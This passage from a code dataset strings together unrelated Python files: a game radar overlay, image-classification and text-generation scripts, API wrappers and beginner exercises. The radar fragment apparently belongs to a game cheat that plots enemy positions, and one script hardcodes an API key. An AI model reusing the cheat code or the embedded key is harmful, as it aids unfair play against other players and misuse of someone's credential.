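## Build the sprite transform: D3DXMatrixAffineTransformation2D composes\r\n        ## the scaling, the rotation about sprite_center and the translation\r\n        ## (applied in that order) into one matrix for drawing the radar map.\r\n        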
matrix = D3DMATRIX()\r\n d3dxdll.D3DXMatrixAffineTransformation2D(byref(matrix), #@UndefinedVariable\r\n c_float(scaling), # scaling\r\n byref(sprite_center), # rotation center\r\n c_float(angle), # angle\r\n byref(trans) # translation\r\n )\r\n \r\n r = D3DRECT(rx, ry, rx + rw, ry + rh)\r\n frame.device.Clear(1, byref(r), D3DCLEAR.TARGET, MAP_COLOR_BACK, 1, 0)\r\n if keys[\"KEY_RADAR_MAP\"]:\r\n frame.device.SetRenderState(174, True)\r\n save_scissors = None\r\n try:\r\n save_scissors = RECT()\r\n frame.device.GetScissorRect(byref(save_scissors))\r\n scissors = RECT(rx, ry, rx+rw, ry+rh)\r\n frame.device.SetScissorRect(byref(scissors))\r\n except:\r\n pass\r\n \r\n \r\n frame.sprite.Begin(0)\r\n frame.sprite.SetTransform(matrix)\r\n frame.sprite.Draw(textures.textures[map_name], None, None, None, BIG_RADAR_BLENDING)\r\n frame.sprite.Flush()\r\n frame.sprite.End()\r\n \r\n frame.device.SetRenderState(174, False)\r\n \r\n if not save_scissors is None:\r\n frame.device.SetScissorRect(byref(save_scissors))\r\n \r\n draw4(frame.line, rx, ry, rx+rw, ry, rx+rw, ry+rh, rx, ry+rh, 2, MAP_COLOR_BORDER)\r\n \r\n p_pos = VECTOR()\r\n for te in self.env.tracker.get_tracked_entity_list():\r\n p_pos.x = transl[0] + p_matrix[0]*te.pos.x + p_matrix[1]*te.pos.y\r\n p_pos.y = transl[1] + p_matrix[2]*te.pos.x + p_matrix[3]*te.pos.y\r\n cx, cy = self.calcPoint(p_pos, matrix)\r\n if te.type == ET_TURRET:\r\n self.env.sprites.draw_sentry(cx, cy, te.planter.enemy)\r\n if te.type == ET_HELICOPTER:\r\n self.env.sprites.draw_heli(cx, cy, -te.yaw + read_game.view_angles.y + arrow_angle + arrow_inversion, te.planter.enemy, te.weapon_num)\r\n if te.type == ET_PLANE:\r\n self.env.sprites.draw_plane(cx, cy, -te.yaw + read_game.view_angles.y + arrow_angle + arrow_inversion, te.planter.enemy)\r\n if te.type == ET_EXPLOSIVE and te.model_name.find(\"_AIRDROP_\") > 0:\r\n self.env.sprites.draw_flare(cx, cy)\r\n \r\n draw_arrow(frame.line, rx + rw/2, ry + rh/2, 0, MAP_COLOR_ME); # myself\r\n \r\n for p in read_game.player:\r\n if p != read_game.my_player and p.type == ET_PLAYER and p.valid and p.alive & ALIVE_FLAG:\r\n p_pos.x = transl[0] + p_matrix[0]*p.pos.x + p_matrix[1]*p.pos.y\r\n p_pos.y = transl[1] + p_matrix[2]*p.pos.x + p_matrix[3]*p.pos.y\r\n cx, cy = self.calcPoint(p_pos, matrix)\r\n draw_arrow(frame.line, cx, cy, -p.yaw + read_game.view_angles.y + arrow_angle + arrow_inversion, p.color_map);\r\n \r\n def calcPoint(self, vec, mat):\r\n ir = D3DXVECTOR2()\r\n d3dxdll.D3DXVec2TransformCoord(byref(ir), byref(vec), byref(mat)) #@UndefinedVariable\r\n if ir.x < self.rx: ir.x = self.rx\r\n if ir.y < self.ry: ir.y = self.ry\r\n if ir.x > self.rx + self.rw: ir.x = self.rx + self.rw\r\n if ir.y > self.ry + self.rh: ir.y = self.ry + self.rh\r\n return (ir.x, ir.y)\r\n","sub_path":"src/Radar2.py","file_name":"Radar2.py","file_ext":"py","file_size_in_byte":5645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"120949365","text":"\"\"\"\nImageNet Validation Script\nAdapted from https://github.com/rwightman/pytorch-image-models\nThe script is further extend to evaluate VOLO\n\"\"\"\nimport argparse\nimport os\nimport csv\nimport glob\nimport time\nimport logging\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nfrom collections import OrderedDict\nfrom contextlib import suppress\n\nfrom timm.models import create_model, apply_test_time_pool, load_checkpoint, is_model, list_models\nfrom timm.data import create_dataset, create_loader, resolve_data_config, 
RealLabelsImagenet\nfrom timm.utils import accuracy, AverageMeter, natural_key, setup_default_logging, set_jit_legacy\nimport models\n\nhas_apex = False\ntry:\n from apex import amp\n has_apex = True\nexcept ImportError:\n pass\n\nhas_native_amp = False\ntry:\n if getattr(torch.cuda.amp, 'autocast') is not None:\n has_native_amp = True\nexcept AttributeError:\n pass\n\ntorch.backends.cudnn.benchmark = True\n_logger = logging.getLogger('validate')\n\n\nfrom models.volo import *\nfrom utils import load_pretrained_weights \n\nfrom torchvision import datasets, models, transforms\nimport PIL\nfrom PIL import Image\nimport cv2\nimport ipdb\n\nclass opt:\n weight_path = \"weights/d1_224_84.2.pth.tar\"\n arch = \"efficientnet-b2\"\n conf_thres = 0.5\n device = 'cpu'\n image_size = 224 #'inference size (pixels)'\n advprop = False\n pretrained = False\n\n\nimage_size = opt.image_size\n\nif opt.advprop:\n normalize = transforms.Lambda(lambda img: img * 2.0 - 1.0)\nelse:\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n\n\n# Applying Transforms to the Data\nimage_transforms = {\n 'train': transforms.Compose([\n transforms.RandomResizedCrop(image_size),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize,\n ]),\n 'valid': transforms.Compose([\n transforms.Resize(image_size, interpolation=PIL.Image.BICUBIC),\n transforms.CenterCrop(image_size),\n transforms.ToTensor(),\n normalize,\n ]),\n 'test': transforms.Compose([\n transforms.Resize(image_size, interpolation=PIL.Image.BICUBIC),\n transforms.CenterCrop(image_size),\n transforms.ToTensor(),\n normalize,\n ])\n}\n\n# create model\nmodel = volo_d1()\n\n# load the pretrained weights\n# change num_classes based on dataset, can work for different image size \n# as we interpolate the position embeding for different image size.\nload_pretrained_weights(model, opt.weight_path, use_ema=False, \n strict=False, num_classes=1000)\n\n# ipdb.set_trace()\n\n\nparser = argparse.ArgumentParser(description='PyTorch ImageNet Validation')\n\nparser.add_argument('-ic', '--image_classification', type=str, default='images/000000050811.jpg', help='分类模型测试图片')\nparser.add_argument('--model', '-m', metavar='NAME', default='volo_d1',\n help='model architecture (default: dpn92)')\nparser.add_argument('--checkpoint', default='weights/', type=str, metavar='PATH',\n help='path to latest checkpoint (default: none)')\nparser.add_argument('--pretrained', dest='pretrained', action='store_true',\n help='use pre-trained model')\nparser.add_argument('--image_size', default=224, type=int,\n help='image size')\n\n##image classification\ndef inference_classification(test_image):\n '''\n Function to predict the class of a single test image\n Parameters\n :param model: Model to test\n :param test_image_name: Test image\n\n '''\n\n transform = image_transforms['test']\n\n # test_image = Image.open(test_image_name)\n # test_image_np = cv2.imread(image_name)\n # test_image = Image.fromarray(test_image_np) # 这里test_image_np为原来的numpy数组类型的输入\n\n test_image_tensor = transform(test_image)\n test_image_tensor = test_image_tensor.view(1, 3, image_size, image_size)\n # if torch.cuda.is_available():\n # test_image_tensor = test_image_tensor.view(1, 3, image_size, image_size).cuda()\n # else:\n # test_image_tensor = test_image_tensor.view(1, 3, image_size, image_size)\n\n with torch.no_grad():\n model.eval()\n # Model outputs log probabilities\n out = model(test_image_tensor)\n ipdb.set_trace()\n # ps = torch.exp(out)\n ps = 
torch.nn.functional.softmax(out, dim =1)\n        # take the top-1 class index and its probability\n        score, cls_idx = torch.max(ps, dim = 1)\n\n    return cls_idx.item(), score.item()\n\ndef main():\n    setup_default_logging()\n    args = parser.parse_args()\n\n    image_path = args.image_classification\n    assert os.path.exists(image_path), 'image_path does not exist'\n    image_cv = cv2.imread(image_path)\n    assert image_cv is not None, 'image_cv imread Failed'\n    image_pil = Image.fromarray(image_cv)\n    classification_start = time.time()\n    cls_cn, score = inference_classification(image_pil)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":4905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"517244942","text":"# Packages\r\nfrom __future__ import division\r\nimport tensorflow as tf\r\nprint(\"Using Tensorflow Version: \" + tf.__version__)\r\ntf.enable_eager_execution()\r\nimport numpy as np, pandas as pd\r\nimport os, time, re, string\r\nfrom operator import itemgetter\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.preprocessing import OneHotEncoder\r\n\r\n# User Input\r\npath_to_file = 'C:/Users/user/Documents/school/practicum/pres_txt_no_punct.txt'\r\nmodel_save_loc = 'C:/Users/user/Documents/school/practicum/tf_models/'\r\nn_epochs = 40\r\nearly_stop = 4\r\nlr = 0.005\r\nbatch_size = 50\r\nseq_length = 100\r\nrnn_units = 1000\r\nembed_dim = 256\r\n\r\n# Define Functions\r\ndef seconds_to_time(sec):\r\n    if (sec // 3600) == 0:\r\n        HH = '00'\r\n    elif (sec // 3600) < 10:\r\n        HH = '0' + str(int(sec // 3600))\r\n    else:\r\n        HH = str(int(sec // 3600))\r\n    min_raw = (np.float64(sec) - (np.float64(sec // 3600) * 3600)) // 60\r\n    if min_raw < 10:\r\n        MM = '0' + str(int(min_raw))\r\n    else:\r\n        MM = str(int(min_raw))\r\n    sec_raw = (sec - (np.float64(sec // 60) * 60))\r\n    if sec_raw < 10:\r\n        SS = '0' + str(int(sec_raw))\r\n    else:\r\n        SS = str(int(sec_raw))\r\n    return HH + ':' + MM + ':' + SS + ' (hh:mm:ss)'\r\n\r\ndef txt_lower_alpha_only(text):\r\n    '''returns string without punctuation or numbers, all lower case'''\r\n    text_nopunct = ''.join([w.lower() for w in re.sub(r'[^\\w\\s]', ' ', re.sub('['+string.punctuation+']', ' ', text))])\r\n    text_nonums = ''.join([i for i in text_nopunct if not i.isdigit()])\r\n    return text_nonums\r\n\r\ndef txt_to_word_list(text):\r\n    '''returns list of space-separated words'''\r\n    return [w for w in text.split()]\r\n\r\ndef imp_txt_word_list_vocab(txt_file_loc):\r\n    '''imports text, returns list of lowercase words without punctuation or numbers'''\r\n    txt = open(txt_file_loc).read()\r\n    clean_txt = txt_lower_alpha_only(txt)\r\n    clean_txt_list = txt_to_word_list(clean_txt)\r\n    vocab = sorted(set(clean_txt_list))\r\n    return clean_txt_list, vocab\r\n\r\ndef map_wordlist_2_int(word_list, vocab_list):\r\n    '''returns encoded words based on unique list'''\r\n    word_to_index = {u:i for i, u in enumerate(vocab_list)}\r\n    text_to_num = np.array([word_to_index[c] for c in word_list])\r\n    return text_to_num\r\n\r\ndef map_int_2_wordlist(word_list, vocab_list):\r\n    '''returns encoded words based on unique list'''\r\n    word_to_index = {u:i for i, u in enumerate(vocab_list)}\r\n    text_to_num = np.array([word_to_index[c] for c in word_list])\r\n    return word_to_index\r\n\r\ndef sep_x_y_words(words):\r\n    '''splits chunk of words into sequence'''\r\n    x_words = words[:-1]\r\n    y_words = words[1:]\r\n    return x_words, y_words\r\n\r\ndef slice_by_index(lst, indices):\r\n    '''slice a list with a list of indices'''\r\n    slicer = 
itemgetter(*indices)(lst)\r\n if len(indices) == 1:\r\n return [slicer]\r\n return list(slicer)\r\n\r\ndef batch_order_pos(y, batch_size):\r\n \"\"\"positions for batch iteration\"\"\"\r\n idx = [i for i in range(0, len(y))]\r\n n_batches = len(y) // batch_size\r\n batch_list = []\r\n for batch_idx in np.array_split(idx, n_batches):\r\n batch_list.append([z for z in batch_idx])\r\n return batch_list\r\n\r\ndef tf_train_seq_data_proc(num_txt, batch_size, max_seq):\r\n \"\"\"creates shuffled tensorflow data object from matrix\"\"\"\r\n x_and_y = tf.data.Dataset.from_tensor_slices(num_txt).apply(tf.contrib.data.batch_and_drop_remainder(max_seq + 1))\r\n x_y_mapped = x_and_y.map(sep_x_y_words)\r\n output = x_y_mapped.shuffle(10000).apply(tf.contrib.data.batch_and_drop_remainder(batch_size))\r\n return output\r\n\r\ndef tf_train_seq_data_proc_nobatch(num_txt, batch_size, max_seq):\r\n \"\"\"creates shuffled tensorflow data object from matrix\"\"\"\r\n x_and_y = tf.data.Dataset.from_tensor_slices(num_txt).apply(tf.contrib.data.batch_and_drop_remainder(max_seq + 1))\r\n x_y_mapped = x_and_y.map(sep_x_y_words)\r\n output = x_y_mapped.shuffle(10000)\r\n return output\r\n\r\nclass rnn_spec(tf.keras.Model):\r\n def __init__(self, dict_len, embed_dim, num_units):\r\n super(rnn_spec, self).__init__()\r\n self.num_units = num_units\r\n self.embedding = tf.keras.layers.Embedding(dict_len, embed_dim)\r\n self.gru = tf.keras.layers.CuDNNLSTM(self.num_units,\r\n return_sequences = True,\r\n recurrent_initializer = 'glorot_uniform',\r\n stateful = False)\r\n self.fc = tf.keras.layers.Dense(dict_len)\r\n def call(self, x):\r\n embedding = self.embedding(x)\r\n output = self.gru(embedding)\r\n prediction = self.fc(output)\r\n return prediction\r\n\r\ndef split_lst_x_perc(lst, perc):\r\n \"\"\"train test split without reordering or shuffling\"\"\"\r\n tst_idx = [i for i in range(0, int(len(lst) * 0.2))]\r\n trn_idx = [i for i in range(int(len(lst) * 0.2), len(lst))]\r\n tst = slice_by_index(lst, tst_idx)\r\n trn = slice_by_index(lst, trn_idx)\r\n return trn, tst\r\n\r\ndef loss_function(real, preds):\r\n return tf.losses.sparse_softmax_cross_entropy(labels=real, logits=preds)\r\n\r\ndef train_txt_gen_rnn(train_dat, valid_dat, vocab, embed_dim, units, batch_size, seq_len,\r\n learn_rt, n_epochs, early_stop_epochs, save_loc):\r\n \"\"\"train rnn to predict next words in the sequence\"\"\"\r\n start_tm = time.time()\r\n # Model Specification\r\n rnn = rnn_spec(dict_len = len(vocab),\r\n embed_dim = embed_dim,\r\n num_units = units)\r\n optimizer = tf.train.AdamOptimizer(learning_rate = learn_rt)\r\n rnn.build(tf.TensorShape([batch_size, seq_len]))\r\n valid_x, valid_y = next(iter(valid_dat))\r\n # Early Stopping Placeholders\r\n best_val_loss = 999999\r\n epoch_ph = []; trn_loss_ph = []; val_loss_ph = []; break_ph = []\r\n # Iterative Training\r\n for epoch in range(n_epochs):\r\n # Train\r\n for (batch, (inp, target)) in enumerate(train_dat):\r\n with tf.GradientTape() as tape:\r\n train_predictions = rnn(inp)\r\n train_loss = loss_function(target, train_predictions)\r\n grads = tape.gradient(train_loss, rnn.variables)\r\n optimizer.apply_gradients(zip(grads, rnn.variables))\r\n # Validation\r\n for (batch, (inp, target)) in enumerate(valid_dat):\r\n with tf.GradientTape() as tape:\r\n valid_predictions = rnn(valid_x)\r\n valid_loss = loss_function(valid_y, valid_predictions)\r\n print ('Ep. 
{} Loss: Train {:.4f} Val {:.4f}'.format(epoch + 1, train_loss, valid_loss))\r\n        # Record Epoch Results\r\n        epoch_ph.append(epoch + 1)\r\n        trn_loss_ph.append(train_loss)\r\n        val_loss_ph.append(valid_loss)\r\n        # Early Stopping\r\n        best_val_loss = min(val_loss_ph)\r\n        if (valid_loss > best_val_loss):\r\n            break_ph.append(1)\r\n        else:\r\n            break_ph = []\r\n        if sum(break_ph) >= early_stop_epochs:\r\n            print(\"Stopping after \" + str(int(epoch + 1)) + \" epochs.\")\r\n            print(\"Validation cross entropy hasn't improved in \" + str(int(early_stop_epochs)) + \" rounds.\")\r\n            break\r\n    # Model Saving\r\n    checkpoint_prefix = os.path.join(save_loc, \"ckpt\")\r\n    checkpoint = tf.train.Checkpoint(optimizer=optimizer, model=rnn)\r\n    checkpoint.save(file_prefix = checkpoint_prefix)\r\n    # Output Training Progress\r\n    output_df = pd.DataFrame({'Epoch': epoch_ph,\r\n                              'Train Loss': trn_loss_ph,\r\n                              'Validation Loss': val_loss_ph})\r\n    end_tm = time.time()\r\n    sec_elapsed = (np.float64(end_tm) - np.float64(start_tm))\r\n    print('Execution Time: ' + seconds_to_time(sec_elapsed))\r\n    return output_df\r\n\r\ndef text_pred(input_str, vocab, model_obj, num_words_gen = 10, temperature = 1.0, print_txt = True):\r\n    clean_input_str = txt_lower_alpha_only(input_str).split()\r\n    input_eval = map_wordlist_2_int(word_list = [w.lower() if w.lower() in vocab else vocab[0] for w in clean_input_str],\r\n                                    vocab_list = vocab)\r\n    input_eval = tf.expand_dims(input_eval, 0)\r\n    idx2char = {i:u for i, u in enumerate(vocab)}\r\n    text_generated = []\r\n    model_obj.reset_states()\r\n    for i in range(num_words_gen):\r\n        # use the model passed in as model_obj (not the global \"model\")\r\n        predictions = model_obj(input_eval)\r\n        predictions = tf.squeeze(predictions, 0)\r\n        predictions = predictions / temperature\r\n        predicted_id = tf.multinomial(predictions, num_samples=1)[-1,0].numpy()\r\n        input_eval = tf.expand_dims([predicted_id], 0)\r\n        text_generated.append(idx2char[predicted_id])\r\n    text_gen_sep = ' '.join(text_generated)\r\n    if print_txt:\r\n        concat_txt = input_str + \" ~~~ RNN -> ~~~ \" + text_gen_sep\r\n        print(concat_txt)\r\n    return input_str, text_gen_sep\r\n\r\n# Execute Data Prep Functions\r\nword_list, vocab = imp_txt_word_list_vocab(txt_file_loc = path_to_file)\r\ntrain_word_list, valid_word_list = split_lst_x_perc(word_list, 0.1)\r\ntrain_word_num_list = map_wordlist_2_int(word_list = train_word_list, vocab_list = vocab)\r\nvalid_word_num_list = map_wordlist_2_int(word_list = valid_word_list, vocab_list = vocab)\r\n\r\n# Create Tensorflow Graph & Fit RNN Model\r\ntf.reset_default_graph()\r\ntrain = tf_train_seq_data_proc(num_txt = train_word_num_list, batch_size = batch_size, max_seq = seq_length)\r\nvalid = tf_train_seq_data_proc(num_txt = valid_word_num_list, batch_size = 1, max_seq = seq_length)\r\n\r\ntrain_progress = train_txt_gen_rnn(train_dat = train,\r\n                                   valid_dat = valid,\r\n                                   vocab = vocab,\r\n                                   embed_dim = embed_dim,\r\n                                   units = rnn_units,\r\n                                   batch_size = batch_size,\r\n                                   seq_len = seq_length,\r\n                                   learn_rt = lr,\r\n                                   n_epochs = n_epochs,\r\n                                   early_stop_epochs = early_stop,\r\n                                   save_loc = model_save_loc)\r\n\r\n\r\n\r\n# Restore Saved Model & Predict Words\r\nmodel = rnn_spec(dict_len = len(vocab),\r\n                 embed_dim = embed_dim,\r\n                 num_units = rnn_units)\r\ncheckpoint = tf.train.Checkpoint(model=model)\r\ncheckpoint.restore(tf.train.latest_checkpoint(model_save_loc))\r\nmodel.build(tf.TensorShape([1, None]))\r\n\r\n\r\nstr1 = \"Tired of it. And we're doing some great deals with other countries, also. \\\r\nYou've been reading about it. And they're getting done one by one. 
\\\r\nAnd if they don't get done, we come out almost better. So that's the way it is. \\\r\nBut we're thrilled to be joined tonight by many of your state's great Republican leaders.\"\r\n\r\nstr2 = \"Going to beat Joe Donnelly. You're going to beat Joe Donnelly. \\\r\nYou have to, because we need the votes. We need the votes. \\\r\nYou're not going to get -- Joe is not going to vote for us on anything. \\\r\nHe's maybe going to vote for a great judge right now. \\\r\nBut before we talk about that, I want to bring a person up to the stage who's really done an incredible job. \\\r\nHe went through a primary with a couple of real pros. \\\r\nAnd I have to say, they have been so fantastic. You did so well. \\\r\nSo well. And we appreciate it, man. You know what I'm talking about. You know. Incredible.\"\r\n\r\nstr3 = \"You know, in the studio, you hear, they go, listen, he's about ready to go. Look, ladies and gentlemen\"\r\n\r\nstr4 = \"Democrats want to raise your taxes. We want to lower your taxes. By the way, that doesn't sound like a great campaign theme\"\r\n\r\nstr5 = \"I've had such an incredible experience with the miners. \\\r\nAnd just a little while ago, backstage, there were nine -- of the nine -- now, these were tough guys. \\\r\nThese are really -- these are seriously tough cookies. In fact\"\r\n\r\nstr6 = \"And thanks to our effort, many drug companies are freezing or reversing planned price increases. \\\r\nYou remember two weeks ago, Pfizer — and I take my hat off to them — I like them — they increased \\\r\ntheir prices substantially of drugs. And I got angry\"\r\n\r\nstr7 = \"But our blue-collar workers believe their lives are headed in the right direction, \\\r\nand the poll numbers are massive. We've increased exports of clean, beautiful coal, one of our great resources\"\r\n\r\nstr_list = [str1, str2, str3, str4, str5, str6, str7]\r\n\r\n\r\nfor s in str_list:\r\n text_pred(input_str = s,\r\n vocab = vocab,\r\n model_obj = model,\r\n num_words_gen = 10,\r\n temperature = 1.0,\r\n print_txt = True)\r\n print(\"_________\\n\\n\")\r\n \r\n\r\n\r\n\r\n\"\"\"\r\ninput_txt, output_txt = text_pred(input_str = start_string,\r\n vocab = vocab,\r\n model_obj = model,\r\n num_words_gen = 10,\r\n temperature = 1.0,\r\n print_txt = True)\r\n\"\"\"\r\n","sub_path":"pres_txt_proc_tf_function.py","file_name":"pres_txt_proc_tf_function.py","file_ext":"py","file_size_in_byte":13005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"466913095","text":"#import json\n\nimport argparse\nimport six\n\n\"\"\" Translates provided orig_text to target language string \"\"\"\ndef translate(text, target = \"en\"):\n from google.cloud import translate_v2 as translate\n translate_client = translate.Client()\n if isinstance(text, six.binary_type):\n text = text.decode('utf-8')\n result = translate_client.translate(text, target_language = target)\n\n #print(u'Text: {}'.format(result['input']))\n #print(u'Translation: {}'.format(result['translatedText']))\n \n trans_text = format(result['translatedText'])\n translated_product= [trans_text, target]\n\n return translated_product\n\n\n","sub_path":"translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"617051602","text":"\"\"\" Faça uma função que receba uma matriz de 3x3 elementos. 
Calcule a soma dos elementos que estão acima da diagonal\nprincipal.\"\"\"\nfrom random import randint\n\n\ndef acima_principal(*args):\n    \"\"\"\n    -> Função que soma os valores localizados acima da diagonal principal.\n    :param args: Matriz fornecida pelo usuário.\n    :return: Retorna a soma dos valores localizados acima da diagonal principal.\n    \"\"\"\n    i = j = somador = 0\n    for listas in args:\n        for _ in listas:\n            if i < j:\n                num = args[i][j]\n                somador += num\n            j += 1\n        i += 1\n        j = 0\n    return f'A soma dos valores que estão ACIMA da diagonal principal é {somador}'\n\n\nmatriz = [[randint(0, 10) for _ in range(3)], [randint(0, 10) for _ in range(3)], [randint(0, 10) for _ in range(3)]]\nfor linhas in matriz:  # Impressão da matriz de forma organizada.\n    for valores in linhas:\n        print(f'{valores:^5}', end='')\n    print()\nprint(acima_principal(*matriz))","sub_path":"Seção 8 - Funções/ex048.py","file_name":"ex048.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"31043425","text":"# ITP Week 1 Day 2 Exercise\n\n# Take the user's input for their age\nage = input(\"What is your age? \")\n\n# The user input comes in as a string so we have to cast it to an int!\nint_age = int(age)\n\n# Use an if/else to determine if they are of legal drinking age.\nif int_age >= 21:\n    print(\"Welcome!\")\nelif int_age == 20:\n    years_left = 21 - int(age)\n    print(\"Please come back in \" + str(years_left) + \" year!\")\nelse:\n    years_left = 21 - int(age)\n    print(\"Please come back in \" + str(years_left) + \" years!\")\n\n\n# if the user is of age, print \"Welcome!\"\n# else, tell them to come back in X amount of years (use math operations)\n\n# Bonus: Add a validation by checking the type of the user input\n# to ensure it can be casted as an int. Handle any other input that\n# are not numbers to try again.\n","sub_path":"day_2/exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"372817858","text":"'''\nMedian is the middle value in an ordered integer list. If the size of the list is even,\nthere is no middle value. So the median is the mean of the two middle values.\n\nExamples:\n[2,3,4] , the median is 3\n\n[2,3], the median is (2 + 3) / 2 = 2.5\n\nGiven an array nums, there is a sliding window of size k which is moving from the very left of\nthe array to the very right. You can only see the k numbers in the window. Each time the sliding\nwindow moves right by one position. Your job is to output the median array for each window in\nthe original array.\n\nFor example,\nGiven nums = [1,3,-1,-3,5,3,6,7], and k = 3.\n\nWindow position                Median\n---------------               ------\n[1 3 -1] -3 5 3 6 7            1\n 1 [3 -1 -3] 5 3 6 7           -1\n 1 3 [-1 -3 5] 3 6 7           -1\n 1 3 -1 [-3 5 3] 6 7           3\n 1 3 -1 -3 [5 3 6] 7           5\n 1 3 -1 -3 5 [3 6 7]           6\nTherefore, return the median sliding window as [1,-1,-1,3,5,6].\n\nNote:\nYou may assume k is always valid, ie: k is always smaller than input array's size for non-empty\narray.\n\n\n'''\n\nimport bisect\n\n\ndef median_sliding_window_v2(nums, k):\n    result = []\n    window = nums[:k-1]\n    window.sort()\n    for i in range(k - 1, len(nums)):\n        bisect.insort(window, nums[i])\n        mid = len(window) // 2\n        if k % 2: result.append(float(window[mid]))\n        else: result.append((window[mid] + window[mid - 1]) / 2)\n        window.remove(nums[i - k + 1])\n\n    return result
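\n\n\n# Quick illustrative check (added sketch; mirrors the docstring example above):\nif __name__ == '__main__':\n    print(median_sliding_window_v2([1, 3, -1, -3, 5, 3, 6, 7], 3))\n    # expected output: [1.0, -1.0, -1.0, 3.0, 5.0, 6.0]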
","sub_path":"algorithms/heaps/sliding_window_median.py","file_name":"sliding_window_median.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"244525629","text":"import alpha_vantage\nfrom alpha_vantage.timeseries import TimeSeries\nimport pprint\nimport json\nimport urllib.request\nimport requests\n\n\n### EXAMPLE DATA COLLECTION METHODS\n\n\ndef method_1():\n    url = {}\n    url['demo1'] = \"https://www.alphavantage.co/query?function=TIME_SERIES_INTRADAY&symbol=MSFT&interval=5min&apikey=demo\"\n    url['demo2'] = \"https://www.alphavantage.co/query?function=TIME_SERIES_INTRADAY&symbol=MSFT&interval=5min&outputsize=full&apikey=demo\"\n\n    for item in url:\n        # Python 3: urlopen lives in urllib.request\n        response = urllib.request.urlopen(url[item])\n        data = json.loads(response.read())\n        with open(\"data_files/\" + item + \".meta_data.json\", \"w\") as f:\n            json.dump(data, f)\n\n\ndef method_2():\n    API_URL = \"https://www.alphavantage.co/query\"\n    symbols = ['QCOM', 'INTC', 'PDD']\n    for symbol in symbols:\n        data = { \"function\": \"TIME_SERIES_INTRADAY\",\n                 \"symbol\": symbol,\n                 \"interval\": \"60min\",\n                 \"datatype\": \"json\",\n                 \"apikey\": 'D1OG0BNI06KWU3FO',\n        }\n\n        response = requests.get(API_URL, data)\n        data = response.json()\n        with open(\"data_files/ts_analysis.json\", \"w\") as f:\n            json.dump(data, f)\n\n","sub_path":"data/collect.py","file_name":"collect.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"564324612","text":"# -*- coding: utf-8 -*-\n\nimport json\nimport codecs\n\ncsv_file = codecs.open('data.csv', 'r', 'utf-8')\njson_file = codecs.open('data.json', 'w', 'utf-8')\ncities = csv_file.readlines()\ncity_list = list()\nfor city in cities:\n    city_list.append(city.strip())\ncity_set = set(city_list)\n# build the records first and serialise them in one go, so the output is\n# valid JSON (no trailing comma before the closing bracket)\nrecords = [{'city': city, 'count': city_list.count(city)} for city in city_set]\njson.dump(records, json_file, ensure_ascii=False)\n\ncsv_file.close()\njson_file.close()\n","sub_path":"csvtojson.py","file_name":"csvtojson.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"46727714","text":"import os\nimport cv2\nimport numpy as np\nfrom PIL import Image\n\n\n# -------------- image labels ------------------------\n\n# returns faces and id_list\ndef get_images_and_labels(path):\n    # get the path of all the files in the folder\n    image_paths = 
[os.path.join(path, f) for f in os.listdir(path)]\n # create empty face list\n faces = []\n # create empty ID list\n id_list = []\n\n # now looping through all the image paths and loading the IDs and the images\n for image_path in image_paths:\n # loading the image and converting it to gray scale\n pil_image = Image.open(image_path).convert('L')\n # Now we are converting the PIL image into numpy array\n image_np = np.array(pil_image, 'uint8')\n # getting the ID from the image\n _id = int(os.path.split(image_path)[-1].split(\".\")[1])\n # extract the face from the training image sample\n faces.append(image_np)\n id_list.append(_id)\n return faces, id_list\n\n\n# ----------- train images function ---------------\ndef train():\n recognizer = cv2.face_LBPHFaceRecognizer.create()\n # haar_cascade_path = \"files\" + os.sep + \"haarcascade_frontalface_default.xml\"\n # detector = cv2.CascadeClassifier(haar_cascade_path)\n faces, _id = get_images_and_labels(\"training_images\")\n recognizer.train(faces, np.array(_id))\n recognizer.save(\"files\" + os.sep + \"trainer.yml\")\n print(\"Images Trained Successfully\")\n","sub_path":"modules/train_images.py","file_name":"train_images.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"4149772","text":"\nimport string\nfrom operator import itemgetter\n\n\ndef add_word( word_map, word ):\n '''adds words to a word map'''\n #if the word being tested is not in the document instantiate it\n if word not in word_map and (word != \" \") :\n word_map[ word ] = 0\n\n # add value to the spot\n word_map[ word ] += 1\n\n\ndef build_map( in_file, word_map ):\n '''building the word map'''\n for line in in_file:\n\n # make a list from each line in document\n word_list = line.split()\n\n for word in word_list:\n\n # for every word in the line, strip it and add it \n word = word.strip().strip(string.punctuation).lower()\n if not word==\"\":\n add_word( word_map, word )\n \n\ndef display_map( word_map ):\n '''sets up and prints the word map'''\n word_list = list()\n\n # adding words with their count\n for word, count in word_map.items():\n word_list.append( (word, count) )\n\n # sorts the list \n word_list=sorted(word_list)\n \n freq_list = sorted( word_list, key=itemgetter(1) )\n\n print( \"\\n{:15s}{:5s}\".format( \"Word\", \"Count\" ) )\n print( \"-\"*20 )\n for item in freq_list:\n print( \"{:15s}{:>5d}\".format( item[0], item[1] ) )\n\n\ndef open_file():\n '''opens the file it is told to'''\n str1= input(\"Input a file: \")\n try:\n in_file = open( str1, \"r\" )\n \n except IOError:\n print( 